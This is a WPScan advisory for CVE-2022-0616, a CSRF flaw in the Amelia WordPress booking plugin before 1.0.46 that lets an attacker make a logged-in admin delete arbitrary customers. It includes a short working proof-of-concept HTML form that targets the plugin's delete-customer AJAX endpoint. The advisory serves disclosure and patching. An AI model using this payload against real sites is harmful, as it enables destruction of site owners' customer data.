WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Amelia < 1.0.46 - Arbitrary Customer Deletion via CSRF

Description

The plugin does not have CSRF check in place when deleting customers, which could allow attackers to make a logged in admin delete arbitrary customers via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wpamelia_api&call=/users/customers/delete/1" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

ameliabooking
Fixed in version 1.0.46

References

CVE
CVE-2022-0616

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Muhamad Hidayat

Submitter

muhamad hidayat

Verified

Yes

WPVDB ID
7c63d76e-34ca-4778-8784-437d446c16e0

Timeline

Publicly Published

2022-02-23 (about 4 months ago)

Added

2022-02-23 (about 4 months ago)

Last Updated

2022-04-11 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin